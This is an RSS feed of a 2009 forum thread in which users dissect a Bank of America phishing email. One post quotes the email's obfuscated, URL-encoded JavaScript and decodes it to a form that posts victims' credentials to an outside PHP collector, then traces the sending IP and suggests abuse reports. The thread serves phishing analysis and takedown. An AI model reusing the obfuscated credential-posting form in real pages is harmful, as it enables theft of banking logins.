<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0" xmlns:blogChannel="http://backend.userland.com/blogChannelModule">

<channel>
<title>Topic &#x27;[Phish] Curious BofA phish - manual input found no URLs&#x27; in forum &#x27;Scam and Phishbusters&#x27; - dslreports.com</title>
<link>http://www.dslreports.com/forum/Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671429</link>
<description></description>
<language>en</language>
<pubDate>Sat, 11 Feb 2012 13:51:43 EDT</pubDate>
<lastBuildDate>Sat, 11 Feb 2012 13:51:43 EDT</lastBuildDate>

<item>
<title>Re: [Phish] Curious BofA phish - manual input found no URLs</title>
<link>http://www.dslreports.com/forum/Re-Phish-Curious-BofA-phish-manual-input-found-no-URLs-22672947</link>
<description><![CDATA[MGD posted : The embedded form in that BOA phishing email, which shows being originally copied and saved from: >https://onlineeast.bankofamerica.com/cgi-bin/ias/4KT s2fjNOSVa4JgTQE9WI4BvbjhaFHngFjech7og29088/1/bofa/ibd/IAS/presentation/GotoResetPasscodeWithPinPage<br><br>[att=1] <br><br>As  nwrickert <A HREF="/useremail/u/1070900"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> noted, the submit button will activate a php script <b>demo.php</b> located at  >http://<b>jajo-raq.signet.nl/libImage/demo.php</b> which will process the victim's data, generally by emailing it to the phisher, or storing it in a local file.<br><br>The unescaped javascript:<br><br><pre class="brush: text">&lt;body&gt;&lt;SCRIPT LANGUAGE='JavaScript'&gt;&lt;!-- &#012;hp_d00(unescape("%3C%66%6F%72%6D%20%6D%65%74%68%6F%64%3D%22%50%4F%53%54%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%6A%61%6A%6F%2D%72%61%71%2E%73%69%67%6E%65%74%2E%6E%6C%2F%6C%69%62%49%6D%61%67%65%2F%64%65%6D%6F%2E%70%68%70%22%3E"));//--&gt;&lt;/SCRIPT&gt; &#012; &#012;</pre><!--end code block--><br>Decodes to:<br><br>(">form method="POST" action=">http://jajo-raq.signet.nl/libImage/demo.php"><br><br>jajo-raq.signet.nl: &raquo;<A HREF="http://jajo-raq.signet.nl" >jajo-raq.signet.nl</A>  appears to be a home page for sites hosted in the Netherlands on signet.nl &raquo;<A HREF="http://www.signet.nl/" >www.signet.nl/</A>  sending a complaint to abuse[@]signet.nl to cancel the account.<br><br>Also, the phishing email appears to have originated from a compromised IP 198.60.105.201 in Colorado.<br><br> NetRange:   198.60.105.0 - 198.60.105.255 <br>CIDR:       198.60.105.0/24 <br>NetName:    ZENEZ<br>NetHandle:  NET-198-60-105-0-1<br>Parent:     NET-198-59-0-0-1<br>NetType:    Reassigned<br>Comment:    <br>RegDate:    1994-10-21<br>Updated:    1994-10-21<br><br>RTechHandle: BLG-ARIN<br>RTechName:   Gerber, Boyd Lynn<br>RTechPhone:  +1-801-250-0795<br>RTechEmail:   <br><br>OrgTechHandle: BLG-ARIN<br>OrgTechName:   Gerber, Boyd Lynn<br>OrgTechPhone:  +1-801-250-0795<br>OrgTechEmail:  gerberb[@]zenez.com<br><br>And was relayed via a compromised email account on a server in Spain belonging to lontana-sureste.com<br><br>MGD<div class="borderless"><TABLE WIDTH=95% align=center border=0 CELLPADDING=4"><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#FFFFFF nwrap COLSPAN=3 WIDTH=100%><A HREF="/speak/slideshow/22672947?c=1447205&ret=L2ZvcnVtL3IyMjY3MTQyOS54bWw%3D"><IMG class="apic" BORDER=0 TITLE="74518 bytes" WIDTH=600 HEIGHT=616 SRC="/r0/download/1447205.thumb600~9ec58a726063650b665ded4a21de0cd3/BOA_Phish.jpg/thumb.jpg" ALT="Click for full size"></A></TD></TABLE></div>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/Re-Phish-Curious-BofA-phish-manual-input-found-no-URLs-22672947</guid>
<pubDate>Wed, 08 Jul 2009 11:35:14 EDT</pubDate>
</item>

<item>
<title>Re: [Phish] Curious BofA phish - manual input found no URLs</title>
<link>http://www.dslreports.com/forum/Re-Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671774</link>
<description><![CDATA[nwrickert posted : The phish contains obfuscated javascript, making it difficult to read.<br><br>I saved just the local part into a local file with name "x.html".  Then I browsed to that file with firefox.<br><br>The page displayed contains a form for submitting credentials.  The form is part of the email text, not from an external phishing site.  According to firefox, the completed form is to be posted to<br>http&#58;//jajo-raq.signet.nl/libImage/demo.php<br><br>When I try that link (browsing to that link), I am redirected to a real BofA web site.<br><br>I did not try submitting to phishtracker, since there was no visible link.  If I really wanted to submit, I would have to modify the message to add a line containing that link.  It's probably not worth the trouble since the details are in this thread.<br><small>--<br>AT&T dsl; Speedstream 5100b modem; Zyxel NBG334W router;  openSuSE 11.0; firefox 3.0.11</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/Re-Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671774</guid>
<pubDate>Wed, 08 Jul 2009 08:11:07 EDT</pubDate>
</item>

<item>
<title>[Phish] Curious BofA phish - manual input found no URLs</title>
<link>http://www.dslreports.com/forum/Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671429</link>
<description><![CDATA[Doctor Four posted : Any idea how I can get this one to properly submit to Phishtracker? It was one impersonating Bank Of America, and instead of a clickable link or image in the email, there was only an HTML attachment. At the beginning of this and in the middle of the body there is some obfuscated javascript, and apparently the phish also contains some method for randomly varying the URL. This leads me to believe it is not only a Rock Phish, but Fast Flux as well.<br><br>I have posted the entire email as a text file for anyone who can parse it so Phishtracker will accept it.<br><small>--<br>"The trouble with computers, of course, is that they are very sophisticated idiots." - Doctor Who (from Robot)<br></small><div class="borderless"><TABLE WIDTH=95% align=center border=0 CELLPADDING=4"><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#FFFFFF nwrap WIDTH=33%><A HREF="/r0/download/1447135~d7ab52370060ce5215bcdaeef6f538f8/BofA%20Phish.txt"><IMG  align=absmiddle style="vertical-align:middle;" TITLE="download" SRC="http://i.dslr.net/silk/arrow_down.png" border=0 width=16 height=16><IMG SRC="http://i.dslr.net/1ptrans.gif" WIDTH=10 HEIGHT=1 border=0><big>BofA Phish.txt</big></A> <small>54,705 bytes</small></TD></TABLE></div>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671429</guid>
<pubDate>Wed, 08 Jul 2009 02:53:28 EDT</pubDate>
</item>

</channel>
</rss>

